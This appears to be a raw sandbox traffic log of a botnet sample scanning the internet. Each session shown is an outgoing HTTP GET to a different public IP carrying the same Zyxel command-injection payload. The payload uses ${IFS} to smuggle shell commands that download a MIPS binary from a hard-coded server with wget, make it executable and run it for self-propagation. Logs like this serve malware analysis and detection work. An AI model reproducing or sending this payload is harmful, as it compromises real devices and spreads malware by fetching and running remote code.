                                            Feb 2, 2024 06:21:10.591598034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3871192.168.2.155744678.222.166.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591636896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3872192.168.2.1558462212.189.166.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591674089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3873192.168.2.1559398145.208.209.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591711998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3874192.168.2.154874664.129.43.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591734886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3875192.168.2.1543896206.231.171.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591778040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3876192.168.2.155079672.146.233.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591811895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3877192.168.2.1550184145.189.209.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591849089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3878192.168.2.1533830194.33.78.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591890097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3879192.168.2.1555788122.95.176.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591928005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3880192.168.2.1535974162.180.219.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591969967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3881192.168.2.1548300136.132.0.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592017889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3882192.168.2.1538186209.121.76.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592052937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3883192.168.2.156002647.217.236.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592072010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3884192.168.2.1559348212.134.9.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592119932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3885192.168.2.15408664.222.255.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592144012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3886192.168.2.154390039.178.129.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592181921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3887192.168.2.1535688133.62.62.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592206955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3888192.168.2.1540254123.33.177.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592257977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3889192.168.2.1547252130.164.233.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.592284918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3890192.168.2.1535264149.98.108.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.595256090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3891192.168.2.1549704111.118.254.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601794958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3892192.168.2.154112295.214.143.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601831913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3893192.168.2.153463014.176.38.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601860046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3894192.168.2.154548853.43.93.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601917028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3895192.168.2.154702012.86.225.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601931095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3896192.168.2.154363060.111.233.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.601989031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3897192.168.2.1544572113.183.206.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602022886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3898192.168.2.154860053.77.82.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602051020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3899192.168.2.1557618111.64.114.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602099895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3900192.168.2.154164625.38.75.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602153063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3901192.168.2.1536034162.130.165.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602180958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3902192.168.2.154280843.13.178.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602217913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3903192.168.2.154498265.38.163.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602247000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3904192.168.2.1539780105.143.255.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602271080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3905192.168.2.154694093.241.137.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602313042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3906192.168.2.1558968125.54.38.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602339983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3907192.168.2.1537108112.7.102.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602391958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3908192.168.2.154306291.114.191.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602437019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3909192.168.2.154770048.243.122.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602452040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3910192.168.2.155117863.60.157.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602499962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3911192.168.2.154098276.135.184.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602530956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3912192.168.2.1552432198.149.91.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602560043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3913192.168.2.1534602165.34.153.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602612019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3914192.168.2.1544224143.80.79.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602641106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3915192.168.2.155479677.166.139.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602663994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3916192.168.2.154168878.40.141.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602710009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3917192.168.2.1554670201.73.245.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602756977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3918192.168.2.156065674.144.165.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602785110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3919192.168.2.1555724175.20.33.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602838039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3920192.168.2.1546694209.46.146.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602870941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3921192.168.2.1547978198.147.107.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602900028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3922192.168.2.1552834197.114.68.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602950096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3923192.168.2.1546502111.165.95.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.602979898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3924192.168.2.1553604157.232.196.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603002071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3925192.168.2.1534090117.37.19.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603056908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3926192.168.2.1548804164.66.211.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603096008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3927192.168.2.1556186164.182.75.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603126049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3928192.168.2.155476637.205.120.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603156090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3929192.168.2.1538726162.106.202.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603208065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3930192.168.2.153916276.12.6.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603247881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3931192.168.2.1549088180.72.119.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603274107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3932192.168.2.1538074202.188.143.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603317022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3933192.168.2.1545344156.213.82.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603336096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3934192.168.2.153526059.123.189.116443
                                            TimestampBytes transferredDirectionData
